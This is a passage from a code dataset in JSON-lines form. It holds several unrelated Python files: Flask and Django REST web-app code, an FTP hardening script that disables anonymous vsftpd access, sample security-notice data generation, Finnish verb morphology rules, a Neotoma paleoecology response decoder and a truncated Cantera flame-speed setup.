False\n @classmethod\n def get_by_user_id(cls, data):\n id = { 'id': data }\n query = \"SELECT * FROM comments WHERE user_id = %(id)s;\"\n results = connectToMySQL('learn_app').query_db(query, id)\n comments = [cls(comment) for comment in results]\n return comments\n @staticmethod\n def validate(data):\n errors = {}\n if len(data['title']) < 5:\n errors['title'] = 'The field title should have at least 5 characters'\n if len(data['comment']) < 10:\n errors['comment'] = 'The field comment should have at least 10 characters'\n if len(data['rate']) < 1:\n errors['rate'] = 'The course should be rated'\n if int(data['rate'])<1 or int(data['rate'])>5:\n errors['rate_range'] = 'Rate should be from 1 to 5'\n query='SELECT * FROM comments WHERE course_id=%(course_id)s and user_id=%(user_id)s'\n result=connectToMySQL('learn_app').query_db(query,data)\n if result :\n errors['comment_exist']='You have already comment this course'\n return errors","repo_name":"YeisonAndreyLiCe/LearnApp","sub_path":"flask_app/models/comment.py","file_name":"comment.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3581512714","text":"from flask import Blueprint, redirect, render_template, url_for, request, current_app\nfrom forms import trains\nfrom .database import DataBase, TrainType\n\nadd_views = Blueprint(\n \"add_views\", __name__, url_prefix=\"/add/\", template_folder=\"templates\"\n)\n\n\ndef add_train(train_type: TrainType, data: dict) -> None:\n del data[\"id\"]\n if \"csrf_token\" in data:\n del data[\"csrf_token\"]\n db = DataBase(current_app.config[\"DATABASE\"])\n db.add_train(train_type, **data)\n db.close()\n\n\n@add_views.route(\"/locomotive\", methods=[\"GET\", \"POST\"])\ndef locomotive():\n form = trains.LocomotiveForm()\n if request.method == \"POST\" and form.validate():\n add_train(TrainType.LOCOMOTIVE, form.data)\n return redirect(url_for(\"views.index\"))\n\n return render_template(\"locomotive.html\", form=form, action=\"/add/locomotive\")\n\n\n@add_views.route(\"/wagon\", methods=[\"GET\", \"POST\"])\ndef wagon():\n form = trains.WagonForm()\n if request.method == \"POST\" and form.validate():\n add_train(TrainType.WAGON, form.data)\n return redirect(url_for(\"views.index\"))\n\n return render_template(\"wagon.html\", form=form, action=\"/add/wagon\")\n","repo_name":"Jonas-Luetolf/RailInventory","sub_path":"application/addviews.py","file_name":"addviews.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74927588269","text":"import os\r\nimport re\r\nfrom secScanner.lib import *\r\nfrom secScanner.gconfig import *\r\nimport shutil\r\nlogger = logging.getLogger(\"secscanner\")\r\n\r\ndef S31_anonymousFTP():\r\n set_ftp_anonymous = seconf.get('advance', 'set_ftp_anonymous')\r\n InsertSection(\"Set the prohibit anonymous FTP...\")\r\n if set_ftp_anonymous == 'yes':\r\n if os.path.exists('/etc/vsftpd/vsftpd.conf') and not os.path.exists('/etc/vsftpd/vsftpd.conf_bak'):\r\n shutil.copy2('/etc/vsftpd/vsftpd.conf', '/etc/vsftpd/vsftpd.conf_bak')\r\n # -----------------set the restrictFTPdir----------------\r\n if os.path.exists('/etc/vsftpd/vsftpd.conf'):\r\n with open('/etc/vsftpd/vsftpd.conf', 'r+') as f:\r\n lines = f.readlines()\r\n anonymous_exists = False\r\n for i, line in enumerate(lines):\r\n if line.strip().startswith(\"#anonymous_enable\"):\r\n anonymous_exists = True\r\n lines[i] = lines[i].replace(\"#\", \"\")\r\n if not re.search('NO', line):\r\n lines[i] = \"anonymous_enable=NO\\n\"\r\n break\r\n elif line.strip().startswith(\"anonymous_enable\"):\r\n anonymous_exists = True\r\n if not re.search('NO', line):\r\n lines[i] = \"anonymous_enable=NO\\n\"\r\n break\r\n if not anonymous_exists:\r\n lines.append(\"anonymous_enable=NO\\n\")\r\n f.seek(0)\r\n f.writelines(lines)\r\n f.truncate()\r\n\r\n CHECK_EXIST = 0\r\n with open('/etc/vsftpd/vsftpd.conf', 'r') as read_file:\r\n lines = read_file.readlines()\r\n for line in lines:\r\n if (not re.match('#|$', line)) and re.search('anonymous_enable', line):\r\n IS_EXIST = 1\r\n temp = line.strip('\\n').split('=')\r\n if temp[0] == 'anonymous_enable' and temp[1] == 'NO':\r\n CHECK_EXIST = 1\r\n\r\n if not anonymous_exists:\r\n logger.info(\"set the prohibit anonymous FTP failed, no set option\")\r\n Display(\"- Set the prohibit anonymous FTP...\", \"FAILED\")\r\n elif CHECK_EXIST == 0:\r\n logger.info(\"set the prohibit anonymous FTP failed, wrong setting\")\r\n Display(\"- Set the prohibit anonymous FTP...\", \"FAILED\")\r\n else:\r\n result = subprocess.run(['systemctl', 'is-active', 'vsftpd'], stdout=subprocess.DEVNULL,\r\n stderr=subprocess.STDOUT)\r\n if result.returncode == 0:\r\n subprocess.run(['systemctl', 'restart', 'vsftpd'])\r\n else:\r\n subprocess.run(['systemctl', 'start', 'vsftpd'])\r\n logger.info(\"set the prohibit anonymous FTP successfully\")\r\n Display(\"- Set the prohibit anonymous FTP...\", \"FINISHED\")\r\n else:\r\n Display(\"- filepath /etc/vsftpd/vsftpd.conf not exist...\", \"SKIPPING\")\r\n else:\r\n Display(\"- Skip set prohibit anonymous FTP due to config file...\", \"SKIPPING\")\r\n","repo_name":"openeuler-mirror/secscanner","sub_path":"secScanner/bsc_set/S31_anonymousFTP.py","file_name":"S31_anonymousFTP.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9831329594","text":"#! /usr/bin/env python3\n\nimport os\nimport sys\n\nsys.path.append(os.getcwd())\n\nfrom datetime import datetime\n\n# We're importing the db object from app.py rather than database.py\n# so that it comes with the application context already added with\n# `db = db.init_app(app)`\nfrom webapp.app import app, db\nfrom webapp.models import Notice, Release, Status, CVE, Package\n\n\nwith app.app_context():\n release = Release(\n codename=\"some release\",\n name=\"00.00\",\n version=\"0.0.0\",\n lts=True,\n development=False,\n release_date=datetime.now(),\n esm_expires=datetime.now(),\n support_expires=datetime.now(),\n )\n db.session.add(release)\n\n package = Package(\n name=\"some package\", source=\"\", launchpad=\"\", ubuntu=\"\", debian=\"\"\n )\n db.session.add(package)\n\n for usn_num in range(9999):\n cves = []\n\n for cve_num in range(5):\n cve = CVE(\n id=f\"CVE-{usn_num}-{cve_num}\",\n published=datetime.now(),\n description=\"\",\n ubuntu_description=\"\",\n notes={},\n priority=\"unknown\",\n cvss3=2.3,\n mitigation=\"\",\n references={},\n patches={},\n tags={},\n bugs={},\n status=\"active\",\n )\n db.session.add(cve)\n cves.append(cve)\n\n status = Status(\n status=\"pending\", cve=cve, package=package, release=release\n )\n db.session.add(status)\n\n notice = Notice(\n id=f\"USN-{usn_num:04d}\",\n is_hidden=False,\n published=datetime.now(),\n summary=\"\",\n details=\"\",\n instructions=\"\",\n releases=[release],\n cves=cves,\n )\n db.session.add(notice)\n\n db.session.commit()\n","repo_name":"canonical/ubuntu-com-security-api","sub_path":"scripts/generate-sample-security-data.py","file_name":"generate-sample-security-data.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"38"} +{"seq_id":"5550428625","text":"'''\nAuthor : Li Wang\nDate : 2022-04-12 10:38:44\nLastEditors : Li Wang\nLastEditTime : 2022-04-14 23:53:09\nFilePath : /privatetools/data_processing/annos_processing/human_part_processing.py\nDescription : \n'''\nimport os\nfrom tqdm import tqdm\nfrom loguru import logger\n\nfrom utils import load_annos, save_annos\n\n\ndef get_dict(annos, label, name_list=None):\n out = {}\n if name_list is None:\n for anno in tqdm(annos):\n name = anno['img_name']\n for box in anno['bboxes']:\n box[-1] = label\n out[name] = anno\n else:\n for anno in tqdm(annos):\n name = anno['img_name']\n if name in name_list:\n for box in anno['bboxes']:\n box[-1] = label\n out[name] = anno\n return out\n\n\n\nif __name__=='__main__':\n annos_path_1 = '/home/liwang/projects/privatetools/data_processing/pseudo_annotation/demo_40000.txt'\n annos_path_2 = '/home/liwang/projects/privatetools/data_processing/pseudo_annotation/demo_30000.txt'\n\n annos = load_annos(annos_path_1)\n annos.extend(load_annos(annos_path_2))\n\n logger.info('human part annos num: {}'.format(len(annos)))\n\n name_list = []\n for anno in annos:\n name = anno['img_name']\n name_list.append(name)\n\n logger.info('load hand annos')\n hand_annos = load_annos('/home/liwang/data/human_part_det/yydata/anno_hand_7w.txt')\n logger.info('processing hand annos to dict')\n hand_annos = get_dict(hand_annos, label=4, name_list=name_list)\n\n logger.info('load face annos')\n face_annos = load_annos('/home/liwang/data/yy-data/lmdb/face_anno_raw/train_val/anno_train_7w.txt')\n logger.info('processing face annos to dict')\n face_annos = get_dict(face_annos, label=3, name_list=name_list)\n from IPython import embed; embed()\n\n logger.info('mearge annos')\n for anno in tqdm(annos):\n name = anno['img_name']\n face_bboxes = face_annos[name]['bboxes']\n hand_bboxes = hand_annos[name]['bboxes']\n\n anno['bboxes'].extend(face_bboxes)\n anno['bboxes'].extend(hand_bboxes)\n \n save_annos(annos=annos, save_anno_path='/home/liwang/data/human_part_det/yydata/human_part_yydata_det.txt')\n\n\n # # face_annos太大了\n # hand_annos = load_annos('/home/liwang/data/human_part_det/yydata/anno_hand_7w.txt')\n # name_list = []\n # for anno in hand_annos:\n # name = anno['img_name']\n # name_list.append(name)\n\n # logger.info('load face annos')\n # annos = load_annos('/home/liwang/data/yy-data/lmdb/face_anno_raw/anno.txt')\n # new_annos = []\n # for anno in tqdm(annos):\n # name = anno['img_name']\n # if name in name_list:\n # new_annos.append(anno)\n \n # save_annos(annos=new_annos, save_anno_path='/home/liwang/data/yy-data/lmdb/face_anno_raw/train_val/anno_train_7w.txt')","repo_name":"liwang0621/privatetools","sub_path":"data_processing/annos_processing/human_part_processing.py","file_name":"human_part_processing.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27970938404","text":"\"\"\"Determine whether consonant gradation applies to a Finnish verb.\"\"\"\n\nimport re, sys\nfrom verbconj import get_conjugations, CONJUGATION_DESCRIPTIONS\n\n# Exceptions to rules. Notes:\n# - Format: {(conjugation, verb), ...}.\n# - Order: first by conjugation, then alphabetically.\n# - Start a new line when conjugation changes.\n_EXCEPTIONS_NO = frozenset((\n (52, \"paapoa\"), (52, \"tutua\"), (52, \"tuutua\"),\n (56, \"jatkaa\"),\n (61, \"futia\"), (61, \"tutia\"),\n (72, \"hiljetä\"), (72, \"väljetä\"),\n (73, \"bodata\"), (73, \"bongata\"), (73, \"buuata\"), (73, \"dekoodata\"),\n (73, \"dokata\"), (73, \"fudata\"), (73, \"futata\"), (73, \"hengata\"),\n (73, \"koodata\"), (73, \"laata\"), (73, \"mokata\"), (73, \"niiata\"),\n (73, \"petata\"), (73, \"prakata\"), (73, \"pykätä\"), (73, \"riiata\"),\n (73, \"roudata\"), (73, \"svengata\"), (73, \"trokata\"), (73, \"tsiikata\"),\n (74, \"hirvetä\"), (74, \"kammota\"), (74, \"totota\"),\n))\n_EXCEPTIONS_YES = frozenset((\n (52, \"lohkoa\"),\n (53, \"purkaa\"),\n (59, \"tuntea\"),\n (60, \"lähteä\"),\n (61, \"pyyhkiä\"), (61, \"vihkiä\"),\n (66, \"häväistä\"), (66, \"rangaista\"), (66, \"vavista\"),\n (67, \"jaella\"), (67, \"ommella\"),\n (72, \"halveta\"), (72, \"huveta\"), (72, \"kalveta\"), (72, \"karjeta\"),\n (72, \"kaveta\"), (72, \"kevetä\"), (72, \"kiinnetä\"), (72, \"loitota\"),\n (72, \"lämmetä\"), (72, \"rohjeta\"), (72, \"tarjeta\"), (72, \"ulota\"),\n (72, \"urjeta\"),\n (73, \"evätä\"), (73, \"halvata\"), (73, \"huovata\"), (73, \"hylätä\"),\n (73, \"kaivata\"), (73, \"kammata\"), (73, \"karata\"), (73, \"kellata\"),\n (73, \"kelvata\"), (73, \"kerrata\"), (73, \"kullata\"), (73, \"levätä\"),\n (73, \"luvata\"), (73, \"mullata\"), (73, \"pelätä\"), (73, \"perata\"),\n (73, \"rynnätä\"), (73, \"salvata\"), (73, \"suunnata\"), (73, \"sännätä\"),\n (73, \"tavata\"), (73, \"temmata\"), (73, \"uhata\"), (73, \"vallata\"),\n (73, \"verrata\"), (73, \"virrata\"),\n (74, \"herjetä\"), (74, \"hävetä\"), (74, \"kavuta\"), (74, \"keretä\"),\n (74, \"kerjetä\"), (74, \"kiivetä\"), (74, \"kivuta\"), (74, \"livetä\"),\n (74, \"revetä\"), (74, \"ruveta\"), (74, \"virota\"), (74, \"vivuta\"),\n (75, \"aallota\"), (75, \"hellitä\"), (75, \"keritä\"), (75, \"lämmitä\"),\n (75, \"muodota\"), (75, \"peitota\"), (75, \"ryöpytä\"), (75, \"selitä\"),\n (75, \"siitä\"),\n))\n\nassert _EXCEPTIONS_NO.isdisjoint(_EXCEPTIONS_YES)\n\n# These rules specify which verbs consonant gradation applies to in each\n# conjugation. Notes:\n# - Format: {conjugation: compiledRegex, ...}.\n# - If the conjugation is not listed, consonant gradation does not apply.\n# - Don't hunt for any single verb. If the regex is e.g. [AB]C, each of AC\n# and BC must match 2 verbs or more. Exception: if [AB] forms a logical\n# group, like all the vowels, then only [AB]C needs to match 2 verbs or\n# more.\n_RULES = dict((c, re.compile(r + \"$\", re.VERBOSE)) for (c, r) in (\n (52, \"( [^hst]k | p | [^s]t )[oöuy][aä]\"),\n (53, \"[^s]t(aa|ää)\"),\n (54, \"t(aa|ää)\"),\n (55, \"t(aa|ää)\"),\n (56, \"( k | p | [^s]t )aa\"),\n (57, \"t(aa|ää)\"),\n (58, \"( [^st]k | p | t )e[aä]\"),\n (61, \"( [^hst]k | p | [^s]t )[iy][aä]\"),\n (67, \"( [dpr] | [^s][kt] | ll | nn )ell[aä]\"),\n (72, \"( d | lj | [^ht]k | p | [aeiouyäö] )[aeiouyäö]t[aä]\"),\n (73, \"( [^n]d | ng | lj | [^fhpst][kpt] | [aeiouyäö] ) (ata|ätä)\"),\n (74, \"( [aeioudg] | [hl]j | [^hst][kpt] | mm | nn | rr | rv ) [eou]t[aä]\"),\n (76, \"t(aa|ää)\"),\n))\n\ndef get_consonant_gradation(verb, conj, useExceptions=True):\n \"\"\"Returns whether consonant gradation applies to a Finnish verb in the\n specified declension.\n verb: str\n conj: Kotus conjugation (52-76)\n useExceptions: bool; should be True except for testing purposes\n return: does consonant gradation apply? (bool)\"\"\"\n\n if useExceptions:\n if (conj, verb) in _EXCEPTIONS_NO:\n return False\n if (conj, verb) in _EXCEPTIONS_YES:\n return True\n\n if conj not in _RULES:\n return False\n\n return re.search(_RULES[conj], verb) is not None\n\ndef _get_redundant_exceptions():\n # generate verbs that are unnecessarily listed as exceptions\n for (conj, verb) in _EXCEPTIONS_NO:\n if not get_consonant_gradation(verb, conj, False):\n yield (conj, verb)\n for (conj, verb) in _EXCEPTIONS_YES:\n if get_consonant_gradation(verb, conj, False):\n yield (conj, verb)\n\ndef main():\n for (conj, verb) in _get_redundant_exceptions():\n print(\n f\"Redundant exception: '{verb}' in conjugation {conj}\",\n file=sys.stderr\n )\n\n if len(sys.argv) != 2:\n sys.exit(\n \"Argument: a Finnish verb (not a compound) in the infinitive. \"\n \"Print the Kotus conjugation(s) (52-78) and whether consonant \"\n \"gradation applies.\"\n )\n verb = sys.argv[1]\n\n conjsAndConsGrads = set() # {(conjugation, cons_gradation_applies), ...}\n for conj in get_conjugations(verb):\n conjsAndConsGrads.add((conj, get_consonant_gradation(verb, conj)))\n\n if not conjsAndConsGrads:\n sys.exit(\"Unrecognized verb.\")\n\n for (conj, consGrad) in sorted(conjsAndConsGrads):\n print(\n f\"Conjugation {conj} \"\n f'(like \"{CONJUGATION_DESCRIPTIONS[conj]}\") '\n + (\"without\", \"with\")[consGrad] + \" consonant gradation\"\n )\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"qalle2/finmorph","sub_path":"verb_consgrad.py","file_name":"verb_consgrad.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"35422854413","text":"\"\"\"Response decoder: Neotoma Paleoecology Database.\"\"\"\n\n\ndef taxonomy(resp_json, return_obj, options):\n \"\"\"Extract specific data on taxa from the subquery.\"\"\"\n import yaml\n\n # Full ecological group names\n with open('swagger_server/lookup/neotoma_eco_groups.yaml') as f:\n eco_map = yaml.safe_load(f)\n\n for rec in resp_json.get('data', []):\n\n data = dict()\n \n data.update(db='neotoma')\n \n # Core return\n\n if rec.get('taxonid'):\n data.update(taxon_id='neot:txn:{0:d}'\n .format(rec.get('taxonid')))\n else:\n data.update(taxon_id=None)\n\n data.update(taxon=rec.get('taxonname'))\n\n if rec.get('highertaxonid'):\n data.update(parent_id='neot:txn:{0:d}'\n .format(rec.get('highertaxonid')))\n else:\n data.update(parent_id=None)\n\n data.update(status=rec.get('status'))\n\n if rec.get('publicationid'):\n data.update(source='neot:pub:{0:d}'\n .format(rec.get('publicationid')))\n else:\n data.update(source=None)\n\n data.update(attribution=rec.get('author'))\n\n # Not available from Neotoma\n data.update(rank=None)\n data.update(common_name=None)\n data.update(occurrences_count=None)\n data.update(early_interval=None)\n data.update(late_interval=None)\n data.update(subtaxa_count=None)\n data.update(subtaxa_extant=None)\n data.update(environment=None)\n data.update(env_basis=None)\n data.update(mobility=None)\n data.update(habitat=None)\n data.update(diet=None)\n data.update(composition=None)\n\n # Neotoma only taxonomy fields\n if rec.get('ecolgroup'):\n data.update(ecological_group=eco_map.get(rec.get('ecolgroup')))\n\n return_obj.append(data)\n\n return return_obj\n\n\ndef locales(resp_json, return_obj, options):\n \"\"\"Extract locale data from the subquery.\"\"\"\n import geojson\n from ..elc import ages, geog\n from statistics import mean\n\n # Utlity function: if 1st param is '', 0 or None return 2nd param\n def choose(x, y): return x or y\n\n # Utility function: Choose the greater of two numbers\n def greater(x, y): return x if x > y else y\n\n factor = ages.set_age_scaler(options=options, db='pbdb')\n\n for rec in resp_json.get('data', []):\n\n for dataset in rec.get('dataset'):\n data = dict()\n \n data.update(db='neotoma')\n \n # Dataset level information\n data.update(locale_id='neot:dst:{0:d}'\n .format(choose(dataset.get('datasetid'), 0)))\n data.update(doi=dataset.get('doi'))\n\n data.update(source=dataset.get('database'))\n data.update(locale_name=rec.get('site')['sitename'])\n data.update(data_type=dataset.get('datasettype'))\n data.update(occurrences_count=None)\n data.update(site_id='neot:sit:{0:d}'\n .format(choose(rec.get('site')['siteid'], 0)))\n\n # Record age (unit scaled)\n if dataset.get('agerange'):\n\n old = choose(dataset.get('agerange').get('age'),\n dataset.get('agerange').get('ageold'))\n if old is not None and old >= 0:\n data.update(max_age=round(old / factor, 5))\n else:\n data.update(max_age=None)\n\n yng = choose(dataset.get('agerange').get('age'),\n dataset.get('agerange').get('ageyoung'))\n if yng is not None and yng >= 0:\n data.update(min_age=round(yng / factor, 5))\n else:\n data.update(min_age=None)\n\n # Paleo and modern coordinates\n if rec.get('site').get('geography'):\n loc = geojson.loads(rec.get('site').get('geography'))\n if loc.get('type').lower() == 'point':\n modern = [loc.get('coordinates')[1],\n loc.get('coordinates')[0]]\n else:\n modern = [loc.get('coordinates')[0][0][1],\n loc.get('coordinates')[0][0][0]]\n if options.get('geog') == 'paleo':\n m_age = greater(mean(modern) / 1e6, 1)\n try:\n paleo, ref = geog.resolve_geog(lat=modern[0],\n lon=modern[1],\n mean_age=round(m_age))\n paleo = [round(x, 4) for x in paleo]\n data.update(lat=paleo[0], lon=paleo[1])\n except ValueError as err:\n data.update(lat=modern[0], lon=modern[1])\n else:\n data.update(lat=modern[0], lon=modern[1])\n\n # Site elevation\n if rec.get('site').get('altitude'):\n data.update(elevation=rec.get('site').get('altitude'))\n else:\n data.update(elevation=None)\n\n return_obj.append(data)\n\n return return_obj\n\n\ndef mobile(resp_json, return_obj, options):\n \"\"\"Lightweight response.\"\"\"\n import geojson\n from ..elc import ages, geog\n from statistics import mean\n\n # Utlity function: Choose the existing, non-empty parameter\n def choose(x, y): return x or y\n\n # Utility function: Choose the greater of two numbers\n def greater(x, y): return x if x > y else y\n\n factor = ages.set_age_scaler(options=options, db='neotoma')\n\n for rec in resp_json.get('data', []):\n\n data = dict()\n\n data.update(db='neotoma')\n data.update(occ_id='neot:occ:{0:d}'.format(rec.get('sampleid', 0)))\n \n # Taxonomic information\n if rec.get('sample'):\n\n data.update(taxon=rec.get('sample').get('taxonname'))\n data.update(taxon_id='neot:txn:{0:d}'\n .format(rec.get('sample').get('taxonid', 0)))\n\n # Record age (unit scaled)\n if rec.get('age'):\n\n old = choose(rec.get('age').get('ageolder'),\n rec.get('age').get('age'))\n if old and old >= 0:\n data.update(max_age=round(old / factor, 5))\n else:\n data.update(max_age=None)\n\n yng = choose(rec.get('age').get('ageyounger'),\n rec.get('age').get('age'))\n if yng and yng >= 0:\n data.update(min_age=round(yng / factor, 5))\n else:\n data.update(min_age=None)\n\n if rec.get('site'):\n\n site = rec.get('site')\n\n # Dataset level information\n data.update(elevation=site.get('altitude'))\n data.update(source=site.get('database'))\n data.update(data_type=site.get('datasettype'))\n if site.get('datasetid'):\n data.update(locale_id='neot:dst:{0:d}'\n .format(site.get('datasetid', 0)))\n\n # Paleo and modern coordinates\n if site.get('location'):\n loc = geojson.loads(site.get('location'))\n if loc.get('type').lower() == 'point':\n modern = [loc.get('coordinates')[1],\n loc.get('coordinates')[0]]\n else:\n modern = [loc.get('coordinates')[0][0][1],\n loc.get('coordinates')[0][0][0]]\n if options.get('geog') == 'paleo':\n m_age = greater(mean(modern) / 1e6, 1)\n try:\n paleo, ref = geog.resolve_geog(lat=modern[0],\n lon=modern[1],\n mean_age=round(m_age))\n paleo = [round(x, 4) for x in paleo]\n data.update(lat=paleo[0], lon=paleo[1])\n except ValueError as err:\n data.update(lat=modern[0], lon=modern[1])\n else:\n data.update(lat=modern[0], lon=modern[1])\n\n return_obj.append(data)\n\n return return_obj\n\n\ndef occurrences(resp_json, return_obj, options):\n \"\"\"Extract occurrence data from the subquery.\"\"\"\n import geojson\n from ..elc import ages, geog\n from statistics import mean\n\n # Utlity function: Choose the existing, non-empty parameter\n def choose(x, y): return x or y\n\n # Utility function: Choose the greater of two numbers\n def greater(x, y): return x if x > y else y\n\n factor = ages.set_age_scaler(options=options, db='neotoma')\n\n for rec in resp_json.get('data', []):\n\n data = dict()\n \n data.update(db='neotoma')\n data.update(occ_id='neot:occ:{0:d}'.format(choose(rec.get('occid'), 0)))\n \n # Taxonomic information\n if rec.get('sample'):\n sample = rec.get('sample')\n data.update(taxon=sample.get('taxonname'))\n data.update(taxon_id='neot:txn:{0:d}'\n .format(choose(sample.get('taxonid'), 0)))\n\n # Record age (unit scaled)\n if rec.get('age'):\n\n old = choose(rec.get('age').get('ageolder'),\n rec.get('age').get('age'))\n if old and old >= 0:\n data.update(max_age=round(old / factor, 5))\n else:\n data.update(max_age=None)\n\n yng = choose(rec.get('age').get('ageyounger'),\n rec.get('age').get('age'))\n if yng and yng >= 0:\n data.update(min_age=round(yng / factor, 5))\n else:\n data.update(min_age=None)\n\n # General site level information\n if rec.get('site'):\n site = rec.get('site')\n\n # Dataset level information\n data.update(elevation=site.get('altitude'))\n data.update(source=site.get('database'))\n data.update(data_type=site.get('datasettype'))\n if site.get('datasetid'):\n data.update(locale_id='neot:dst:{0:d}'\n .format(choose(site.get('datasetid'), 0)))\n else:\n data.update(locale_id=None)\n\n # Paleo and modern coordinates\n if site.get('location'):\n loc = geojson.loads(site.get('location'))\n if loc.get('type').lower() == 'point':\n modern = [loc.get('coordinates')[1],\n loc.get('coordinates')[0]]\n else:\n modern = [loc.get('coordinates')[0][0][1],\n loc.get('coordinates')[0][0][0]]\n if options.get('geog') == 'paleo':\n m_age = greater(mean(modern) / 1e6, 1)\n try:\n paleo, ref = geog.resolve_geog(lat=modern[0],\n lon=modern[1],\n mean_age=round(m_age))\n paleo = [round(x, 4) for x in paleo]\n data.update(lat=paleo[0], lon=paleo[1])\n except ValueError as err:\n # data.update(lat=modern[0], lon=modern[1])\n data.update(lat='({0:4.2f})'.format(modern[0]),\n lon='({0:4.2f})'.format(modern[1]))\n else:\n data.update(lat=modern[0], lon=modern[1])\n else:\n data.update(lat=None, lon=None)\n\n return_obj.append(data)\n\n return return_obj\n\n\ndef references(resp_json, return_obj, options):\n \"\"\"Extract references from the subquery.\"\"\"\n pubs = resp_json.get('data')\n\n # Utlity function: if 1st param is '', 0 or None return 2nd param\n def choose(x, y): return x or y\n\n for rec in pubs.get('result', []):\n\n # Available fields\n data = {'db': 'neotoma',\n 'year': rec.get('year'),\n 'journal': rec.get('journal'),\n 'doi': rec.get('doi'),\n 'cite': rec.get('citation'),\n 'page_range': rec.get('pages'),\n 'kind': rec.get('publicationtype')}\n\n # Reference title\n data.update(title=rec.get('booktitle', rec.get('title')))\n\n # Reference number\n data.update(ref_id='neot:pub:{0:d}'\n .format(choose(rec.get('publicationid'), 0)))\n\n # Publisher information\n if rec.get('city') and rec.get('country'):\n data.update(place='{0:s}, {1:s}'.format(rec.get('city'),\n rec.get('country')))\n else:\n data.update(place=rec.get('country'))\n\n # Publication volume(number) or edition\n if rec.get('issue') and rec.get('volume'):\n data.update(vol_no='{0:s} ({1:s})'.format(rec.get('volume'),\n rec.get('issue')))\n elif rec.get('volume'):\n data.update(vol_no=rec.get('volume'))\n\n else:\n data.update(vol_no=rec.get('edition'))\n\n # Publication authors (not always complete in Neotoma record)\n if rec.get('authors'):\n authors = set()\n for author in rec.get('authors'):\n if author.get('familyname'):\n surname = '{0:s},'.format(author['familyname'])\n if author.get('givennames'):\n names = author['givennames'].split()\n fi = '{0:s}.'.format(names[0][0])\n if len(names) > 1:\n mi = '{0:s}.'.format(names[1][0])\n else:\n mi = ''\n authors.add('{0:s} {1:s} {2:s}'.format(surname, fi, mi))\n author_list = list(authors)\n else:\n author_list = []\n data.update(authors=author_list)\n\n # Not currently available directly in Neotoma\n data.update(publisher=None, editor=None)\n\n return_obj.append(data)\n\n return return_obj\n\n\ndef bbox_filter ( wkt_string, lonmin, latmin, lonmax, latmax ):\n \"\"\"\n Return a string that will select records from the geographic range\n given in WKT. If four bounding coordinates are given instead, a\n POLYGON() is constructed from them.\n \"\"\"\n \n if wkt_string:\n return {'loc': wkt_string}\n\n elif lonmin or latmin or lonmax or latmax:\n pattern = 'POLYGON(({0} {1},{2} {1},{2} {3},{0} {3},{0} {1}))'\n return {'loc': pattern.format(lonmin, latmin, lonmax, latmax)}\n\n else:\n return {}\n\n","repo_name":"EarthLifeConsortium/elc_api","sub_path":"swagger_server/handlers/neotoma.py","file_name":"neotoma.py","file_ext":"py","file_size_in_byte":14848,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"38"} +{"seq_id":"12281537618","text":"from rest_framework import serializers\n\nfrom posts.models import Comment, Follow, Group, Post, User\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = User\n fields = ('id', 'username', 'first_name', 'last_name')\n\n\nclass GroupSerializer(serializers.ModelSerializer):\n class Meta:\n model = Group\n fields = ('title', 'slug', 'description')\n\n\nclass CommentSerializer(serializers.ModelSerializer):\n author = serializers.StringRelatedField(read_only=True)\n post = serializers.SlugRelatedField(read_only=True, slug_field='id')\n\n class Meta:\n model = Comment\n fields = ('id', 'author', 'post', 'text', 'created')\n\n\nclass PostSerializer(serializers.ModelSerializer):\n author = serializers.SlugRelatedField(\n read_only=True,\n slug_field='username')\n\n class Meta:\n model = Post\n fields = ('id', 'text', 'author', 'image', 'group', 'pub_date')\n\n\nclass FollowSerializer(serializers.ModelSerializer):\n user = serializers.SlugRelatedField(\n read_only=True,\n slug_field='username',\n default=serializers.CurrentUserDefault()\n )\n following = serializers.SlugRelatedField(\n slug_field='username',\n queryset=User.objects.all()\n )\n\n class Meta:\n model = Follow\n fields = ('user', 'following')\n validators = [\n serializers.UniqueTogetherValidator(\n queryset=Follow.objects.all(),\n fields=('user', 'following'),\n message='Подписка на данного автора уже оформлена'\n )\n ]\n\n def validate_following(self, value):\n if self.context.get('request').user == value:\n raise serializers.ValidationError(\n 'Пользователь не может подписаться на самого себя'\n )\n return value\n","repo_name":"OrdinaryWorker/api_service_yatube","sub_path":"yatube_api/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12900861695","text":"\nimport numpy as np\nfrom mpi4py import MPI\nimport h5py\nimport subprocess\nimport cantera as ct\n\n\nfuel = 'nc7h16'\noxid = 'o2:1, n2:3.76'\nkey_chem = 'Lu'\n\nchemPath_cti = 'KineticModels/Chem/nHeptane/Lu/sk88/chem.yaml'\n\nmin_phi = 0.5\nmax_phi = 2.0\ndel_phi = 0.05\nmin_temp = 300.0\nmax_temp = 1000.0\ndel_temp = 25.0\nmin_presAtm = 1.0\nmax_presAtm = 1.0\ndel_presAtm = 1.0\n\nsavedir = 'Results_SL'\nsubprocess.call(['mkdir','-p', savedir])\n\nflag_save_profile = True\nif flag_save_profile:\n savedir_profile = 'Results_SL_profile/profile_{}_hdf'.format(key_chem)\n subprocess.call(['mkdir','-p', savedir_profile])\n\narray_phi = np.arange(min_phi, max_phi+del_phi/10.0, del_phi)\narray_temp = np.arange(min_temp, max_temp+del_temp/10.0, del_temp)\narray_presAtm = np.arange(min_presAtm, max_presAtm+del_presAtm/10.0, del_presAtm)\narray_pres = ct.one_atm*array_presAtm\n\narray_width = np.array([0.1, 0.05, 0.02, 0.01, 0.005, 0.002, 0.001, 0.0005, 0.0002]) # m\narray_width = np.array([0.02, 0.01, 0.005, 0.002, 0.001, 